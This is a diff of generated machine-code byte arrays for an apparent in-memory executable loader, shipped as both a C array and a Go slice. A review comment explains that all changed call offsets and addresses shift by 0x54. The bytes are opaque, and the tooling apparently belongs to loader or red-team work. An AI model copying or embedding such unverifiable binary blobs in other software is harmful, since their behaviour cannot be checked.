@ -996,7 +1004,7 @@ unsigned char LOADER_EXE_X64[] = {
0x00, 0x49, 0x8b, 0xf8, 0x48, 0x8b, 0xf2, 0x48, 0x8b, 0xe9, 0x45, 0x33,
0xd2, 0x4c, 0x8b, 0x48, 0x60, 0x49, 0x8b, 0x41, 0x18, 0x48, 0x8b, 0x58,
0x10, 0xeb, 0x1c, 0x4d, 0x85, 0xd2, 0x75, 0x20, 0x4c, 0x8b, 0xcf, 0x4c,
0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd, 0xe8, 0xbf, 0xda, 0xff,
0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd, 0xe8, 0x5f, 0xda, 0xff,
0xff, 0x48, 0x8b, 0x1b, 0x4c, 0x8b, 0xd0, 0x48, 0x8b, 0x43, 0x30, 0x48,
0x85, 0xc0, 0x75, 0xdb, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x49, 0x8b, 0xc2,
0x48, 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x83,


@ -7,17 +7,17 @@ var LOADER_EXE_X86 = []byte{
0xe4, 0x02, 0x00, 0x00, 0x33, 0xdb, 0x57, 0x8b, 0xfb, 0x39, 0x9e, 0x38,
0x02, 0x00, 0x00, 0x0f, 0x84, 0xea, 0x00, 0x00, 0x00, 0xff, 0x76, 0x2c,
0xff, 0x76, 0x28, 0xff, 0xb6, 0x8c, 0x00, 0x00, 0x00, 0xff, 0xb6, 0x88,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x45, 0x28, 0x00, 0x00, 0x8b, 0xf8, 0x83,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x99, 0x28, 0x00, 0x00, 0x8b, 0xf8, 0x83,
0xc4, 0x14, 0x85, 0xff, 0x0f, 0x84, 0xc0, 0x00, 0x00, 0x00, 0x53, 0x53,
0x56, 0xe8, 0x2d, 0x26, 0x00, 0x00, 0x8b, 0xc8, 0xb8, 0xd7, 0x22, 0x40,
0x00, 0x2d, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff,
0x56, 0xe8, 0x81, 0x26, 0x00, 0x00, 0x8b, 0xc8, 0xb8, 0x2b, 0x23, 0x40,
0x00, 0x2d, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff,
0xd7, 0xff, 0x76, 0x2c, 0x8b, 0xf8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x0c,
0x02, 0x00, 0x00, 0xff, 0xb6, 0x08, 0x02, 0x00, 0x00, 0x56, 0xe8, 0x03,
0x02, 0x00, 0x00, 0xff, 0xb6, 0x08, 0x02, 0x00, 0x00, 0x56, 0xe8, 0x57,
0x28, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x89, 0x44, 0x24, 0x28, 0xff, 0x76,
0x28, 0xff, 0xb6, 0xa4, 0x00, 0x00, 0x00, 0xff, 0xb6, 0xa0, 0x00, 0x00,
0x00, 0x56, 0xe8, 0xe7, 0x27, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8,
0x00, 0x56, 0xe8, 0x3b, 0x28, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8,
0xff, 0x76, 0x28, 0xff, 0xb6, 0xac, 0x00, 0x00, 0x00, 0xff, 0xb6, 0xa8,
0x00, 0x00, 0x00, 0x56, 0xe8, 0xcd, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x3c,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x21, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x3c,
0x8b, 0xe8, 0x6a, 0x00, 0xff, 0x56, 0x38, 0x83, 0x7c, 0x24, 0x10, 0x00,
0x89, 0x44, 0x24, 0x14, 0x74, 0x4c, 0x85, 0xdb, 0x74, 0x48, 0x85, 0xed,
0x74, 0x44, 0x8d, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x18, 0x07, 0x00,
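Review bot: Every change in this hunk is a +0x54 shift: the rel32 calls (`0xe8, 0x45, 0x28` to `0xe8, 0x99, 0x28`, `0xe8, 0x03, 0x28` to `0xe8, 0x57, 0x28`, and so on) and both absolute immediates in the `0xb8, 0xd7, 0x22, 0x40, 0x00` / `0x2d, 0x7b, 0x36, 0x40, 0x00` pair (0x004022d7 to 0x0040232b, 0x0040367b to 0x004036cf). That pair is a link-time address subtracted from a second link-time address to get a position-independent delta, so it is correct only as long as both sides are regenerated together; the unchanged `0xb9, 0xad, 0x11, 0x40, 0x00`-style immediates in the later LOADER_EXE_X86 hunks are consistent with a single 84-byte insertion late in the image, which is what the final hunk on this page shows. Since the page carries the same loader as a C array (`unsigned char LOADER_EXE_X64[]`) and as a Go slice (`var LOADER_EXE_X86 = []byte{`), please confirm every generated binding was regenerated from the same loader build so the copies do not diverge.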
@ -25,18 +25,18 @@ var LOADER_EXE_X86 = []byte{
0x00, 0x00, 0x03, 0x44, 0x24, 0x14, 0x83, 0xa4, 0x24, 0xdc, 0x00, 0x00,
0x00, 0xfc, 0x89, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
0x18, 0x6a, 0x00, 0x50, 0xff, 0x54, 0x24, 0x18, 0xeb, 0x0c, 0x83, 0xc8,
0xff, 0xeb, 0x09, 0x56, 0xe8, 0xc6, 0x11, 0x00, 0x00, 0x59, 0x8b, 0xc7,
0xff, 0xeb, 0x09, 0x56, 0xe8, 0x1a, 0x12, 0x00, 0x00, 0x59, 0x8b, 0xc7,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd4, 0x02, 0x00, 0x00, 0xc3, 0x8b,
0x44, 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2,
0x04, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x56, 0x57,
0xe8, 0x3e, 0x25, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0xad, 0x11,
0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x01, 0xe8, 0x23, 0x25, 0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x04, 0xe8, 0x10,
0xe8, 0x92, 0x25, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0xad, 0x11,
0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x01, 0xe8, 0x77, 0x25, 0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x04, 0xe8, 0x64,
0x25, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8, 0xfd, 0x24, 0x00, 0x00, 0xb9, 0x2e,
0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8, 0x51, 0x25, 0x00, 0x00, 0xb9, 0x2e,
0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c,
0xe8, 0xea, 0x24, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0xe8, 0x3e, 0x25, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x5f, 0x89, 0x41, 0x10, 0x8b, 0x44, 0x24, 0x08,
0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x08, 0x5e, 0xc3, 0x8b, 0x4c, 0x24,
0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x4d,
@ -56,29 +56,29 @@ var LOADER_EXE_X86 = []byte{
0x83, 0xc6, 0x14, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37, 0x33,
0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x8b,
0x40, 0x2c, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01, 0x33,
0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0xf4, 0x23, 0x00, 0x00, 0x8b,
0x74, 0x24, 0x10, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0xd9, 0x23,
0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x48, 0x24, 0x00, 0x00, 0x8b,
0x74, 0x24, 0x10, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0x2d, 0x24,
0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0xc6, 0x23, 0x00, 0x00, 0xb9, 0x0c, 0x12,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0x1a, 0x24, 0x00, 0x00, 0xb9, 0x0c, 0x12,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8,
0xb3, 0x23, 0x00, 0x00, 0xb9, 0x6b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0xa0, 0x23, 0x00, 0x00, 0xb9,
0x07, 0x24, 0x00, 0x00, 0xb9, 0x6b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0xf4, 0x23, 0x00, 0x00, 0xb9,
0x21, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x10, 0xe8, 0x8d, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x7a, 0x23, 0x00,
0x10, 0xe8, 0xe1, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0xce, 0x23, 0x00,
0x00, 0xb9, 0xb9, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x18, 0xe8, 0x67, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0x54,
0x89, 0x41, 0x18, 0xe8, 0xbb, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0xa8,
0x23, 0x00, 0x00, 0xb9, 0x6e, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x41, 0x23, 0x00, 0x00, 0xb9, 0x69,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x95, 0x23, 0x00, 0x00, 0xb9, 0x69,
0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x24,
0xe8, 0x2e, 0x23, 0x00, 0x00, 0xb9, 0x69, 0x13, 0x40, 0x00, 0x2b, 0xcf,
0xe8, 0x82, 0x23, 0x00, 0x00, 0xb9, 0x69, 0x13, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x5f, 0x89, 0x41, 0x28, 0x8b, 0x44, 0x24, 0x08,
0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x2c, 0x5e, 0xc3, 0x33, 0xc0, 0xc2,
0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56, 0x6a,
0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc, 0x8d,
0x45, 0xd4, 0x50, 0xe8, 0x8b, 0x29, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d,
0x45, 0xd4, 0x50, 0xe8, 0xdf, 0x29, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d,
0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50, 0x0c,
0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d, 0x4d,
0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33, 0xc0,
@ -98,38 +98,38 @@ var LOADER_EXE_X86 = []byte{
0x08, 0xc3, 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2,
0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51,
0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x54, 0x03, 0x00, 0x00,
0x50, 0x56, 0xe8, 0x0a, 0x22, 0x00, 0x00, 0x8b, 0xd8, 0x59, 0x59, 0x85,
0x50, 0x56, 0xe8, 0x5e, 0x22, 0x00, 0x00, 0x8b, 0xd8, 0x59, 0x59, 0x85,
0xdb, 0x75, 0x06, 0x40, 0xe9, 0xd5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x6a,
0x00, 0x8d, 0x86, 0xc8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8, 0x88,
0x00, 0x8d, 0x86, 0xc8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8, 0xdc,
0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x0f, 0x84,
0xb2, 0x00, 0x00, 0x00, 0xbf, 0x48, 0x14, 0x40, 0x00, 0x81, 0xef, 0x3c,
0x14, 0x40, 0x00, 0x0f, 0x88, 0xa1, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
0x18, 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f,
0x84, 0x8d, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xa8, 0x21, 0x00, 0x00, 0xb9,
0x3c, 0x14, 0x40, 0x00, 0x81, 0xe9, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc1,
0x50, 0x55, 0xe8, 0x0c, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
0x84, 0x8d, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xfc, 0x21, 0x00, 0x00, 0xb9,
0x3c, 0x14, 0x40, 0x00, 0x81, 0xe9, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc1,
0x50, 0x55, 0xe8, 0x60, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48,
0x6a, 0x00, 0x8d, 0x86, 0xd8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8,
0x1b, 0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x74,
0x6f, 0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x74,
0x49, 0xbf, 0x5e, 0x14, 0x40, 0x00, 0xbb, 0x52, 0x14, 0x40, 0x00, 0x2b,
0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57, 0x55,
0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x46, 0x21, 0x00,
0x00, 0x81, 0xeb, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8,
0xaf, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x9a, 0x21, 0x00,
0x00, 0x81, 0xeb, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8,
0x03, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40,
0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x55, 0x8b,
0xec, 0x51, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x8d, 0x86, 0x68, 0x03, 0x00,
0x00, 0x50, 0x56, 0xe8, 0x0d, 0x21, 0x00, 0x00, 0x6a, 0x00, 0x8d, 0x8e,
0xe8, 0x05, 0x00, 0x00, 0x51, 0x50, 0x56, 0xe8, 0x9b, 0x21, 0x00, 0x00,
0x00, 0x50, 0x56, 0xe8, 0x61, 0x21, 0x00, 0x00, 0x6a, 0x00, 0x8d, 0x8e,
0xe8, 0x05, 0x00, 0x00, 0x51, 0x50, 0x56, 0xe8, 0xef, 0x21, 0x00, 0x00,
0x8b, 0xf8, 0x83, 0xc4, 0x18, 0x85, 0xff, 0x74, 0x34, 0x8d, 0x45, 0x08,
0x50, 0x6a, 0x40, 0x6a, 0x04, 0x57, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74,
0x24, 0x6a, 0x04, 0x8d, 0x86, 0x0d, 0x06, 0x00, 0x00, 0x50, 0x57, 0xe8,
0x43, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x45, 0xfc, 0x50, 0xff,
0x97, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x45, 0xfc, 0x50, 0xff,
0x75, 0x08, 0x6a, 0x04, 0x57, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40, 0xeb,
0x02, 0x33, 0xc0, 0x5f, 0x5e, 0xc9, 0xc3, 0x81, 0xec, 0xec, 0x02, 0x00,
0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xfc, 0x02, 0x00, 0x00, 0x8d,
0x44, 0x24, 0x34, 0x57, 0x6a, 0x3c, 0x33, 0xed, 0x33, 0xdb, 0x21, 0x5c,
0x24, 0x24, 0xbf, 0x00, 0x03, 0x60, 0x04, 0x55, 0x50, 0xe8, 0x21, 0x27,
0x24, 0x24, 0xbf, 0x00, 0x03, 0x60, 0x04, 0x55, 0x50, 0xe8, 0x75, 0x27,
0x00, 0x00, 0x83, 0xc4, 0x0c, 0xc7, 0x44, 0x24, 0x38, 0x3c, 0x00, 0x00,
0x00, 0x8d, 0x84, 0x24, 0xf8, 0x01, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00,
0x00, 0x89, 0x44, 0x24, 0x48, 0x8d, 0x84, 0x24, 0xf4, 0x00, 0x00, 0x00,
@ -191,9 +191,9 @@ var LOADER_EXE_X86 = []byte{
0x89, 0x44, 0x24, 0x18, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x4e, 0x6a,
0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x74, 0x24, 0x18, 0x6a, 0x00,
0xff, 0x56, 0x3c, 0x89, 0x86, 0x60, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x74,
0x13, 0xff, 0x74, 0x24, 0x10, 0x53, 0x50, 0xe8, 0x17, 0x24, 0x00, 0x00,
0x13, 0xff, 0x74, 0x24, 0x10, 0x53, 0x50, 0xe8, 0x6b, 0x24, 0x00, 0x00,
0x33, 0xed, 0x83, 0xc4, 0x0c, 0x45, 0xeb, 0x02, 0x33, 0xed, 0xff, 0x74,
0x24, 0x10, 0x6a, 0x00, 0x53, 0xe8, 0x25, 0x24, 0x00, 0x00, 0x8b, 0x44,
0x24, 0x10, 0x6a, 0x00, 0x53, 0xe8, 0x79, 0x24, 0x00, 0x00, 0x8b, 0x44,
0x24, 0x24, 0x83, 0xc4, 0x0c, 0x53, 0x6a, 0x01, 0xff, 0x10, 0x50, 0xff,
0x96, 0x88, 0x00, 0x00, 0x00, 0x57, 0xff, 0x96, 0xd0, 0x00, 0x00, 0x00,
0xff, 0x74, 0x24, 0x30, 0xff, 0x96, 0xd0, 0x00, 0x00, 0x00, 0xff, 0x74,
@ -201,8 +201,8 @@ var LOADER_EXE_X86 = []byte{
0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x45, 0xff, 0xb6, 0x58,
0x0d, 0x00, 0x00, 0x8b, 0xbe, 0x60, 0x0d, 0x00, 0x00, 0x8d, 0x86, 0x48,
0x0d, 0x00, 0x00, 0x57, 0x50, 0x8d, 0x86, 0x38, 0x0d, 0x00, 0x00, 0x50,
0xe8, 0x9e, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x2c, 0x0c,
0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0x62, 0x1f, 0x00, 0x00, 0x83,
0xe8, 0xf2, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x2c, 0x0c,
0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb6, 0x1f, 0x00, 0x00, 0x83,
0xc4, 0x1c, 0x3b, 0x87, 0x18, 0x05, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x97,
0x1c, 0x05, 0x00, 0x00, 0x75, 0x04, 0x8b, 0xc5, 0xeb, 0x02, 0x33, 0xc0,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xec, 0x02, 0x00, 0x00, 0xc3, 0x81,
@ -219,11 +219,11 @@ var LOADER_EXE_X86 = []byte{
0x8b, 0xb4, 0x24, 0xf4, 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff,
0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00,
0x00, 0xc6, 0x84, 0x14, 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24,
0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0x97, 0x1e, 0x00, 0x00, 0x89, 0x44,
0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0xeb, 0x1e, 0x00, 0x00, 0x89, 0x44,
0x24, 0x24, 0x83, 0xc4, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc,
0x89, 0x54, 0x24, 0x1c, 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff,
0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04,
0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0x66, 0x1e, 0x00, 0x00, 0x33,
0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0xba, 0x1e, 0x00, 0x00, 0x33,
0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84,
0x24, 0xf8, 0x01, 0x00, 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01,
0x00, 0x00, 0x74, 0x1d, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89,
@ -245,9 +245,9 @@ var LOADER_EXE_X86 = []byte{
0x56, 0x57, 0x8b, 0x40, 0x30, 0x8b, 0x7d, 0x08, 0x8b, 0x40, 0x0c, 0x8b,
0x70, 0x0c, 0x39, 0x4e, 0x18, 0x74, 0x2a, 0x8b, 0x5d, 0x0c, 0x85, 0xc9,
0x75, 0x3f, 0x39, 0x5e, 0x18, 0x74, 0x12, 0x51, 0xff, 0x75, 0x14, 0xff,
0x76, 0x18, 0x57, 0xe8, 0xc3, 0x1b, 0x00, 0x00, 0x83, 0xc4, 0x10, 0x8b,
0x76, 0x18, 0x57, 0xe8, 0x17, 0x1c, 0x00, 0x00, 0x83, 0xc4, 0x10, 0x8b,
0xc8, 0x8b, 0x36, 0x83, 0x7e, 0x18, 0x00, 0x75, 0xdd, 0x85, 0xc9, 0x75,
0x1c, 0xff, 0x75, 0x10, 0x57, 0xe8, 0x0b, 0x1b, 0x00, 0x00, 0x59, 0x59,
0x1c, 0xff, 0x75, 0x10, 0x57, 0xe8, 0x5f, 0x1b, 0x00, 0x00, 0x59, 0x59,
0x85, 0xc0, 0x74, 0x0b, 0xff, 0x75, 0x14, 0x50, 0xff, 0x57, 0x34, 0x8b,
0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x5f, 0x5e, 0x8b, 0xc1, 0x5b, 0x5d, 0xc3,
0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b, 0x4e, 0x18, 0x85,
@ -278,57 +278,57 @@ var LOADER_EXE_X86 = []byte{
0x45, 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff,
0x75, 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51,
0xff, 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec,
0x04, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x8b, 0x19, 0x00, 0x00,
0x8b, 0x75, 0x0c, 0xb9, 0x7a, 0x1f, 0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0x71, 0x19,
0x04, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0xe8, 0xdf, 0x19, 0x00, 0x00,
0x8b, 0x75, 0x0c, 0xb9, 0x7a, 0x1f, 0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0xc5, 0x19,
0x00, 0x00, 0xb9, 0x32, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0x5e, 0x19, 0x00, 0x00, 0xb9, 0x03, 0x20,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0xb2, 0x19, 0x00, 0x00, 0xb9, 0x03, 0x20,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8,
0x4b, 0x19, 0x00, 0x00, 0xb9, 0x9f, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0x38, 0x19, 0x00, 0x00, 0xb9,
0x9f, 0x19, 0x00, 0x00, 0xb9, 0x9f, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0x8c, 0x19, 0x00, 0x00, 0xb9,
0x75, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x10, 0xe8, 0x25, 0x19, 0x00, 0x00, 0xb9, 0x51, 0x1c, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x12, 0x19, 0x00,
0x10, 0xe8, 0x79, 0x19, 0x00, 0x00, 0xb9, 0x51, 0x1c, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x66, 0x19, 0x00,
0x00, 0xb9, 0xb9, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x18, 0xe8, 0xff, 0x18, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0xec,
0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0xd9, 0x18, 0x00, 0x00, 0xb9, 0x2e,
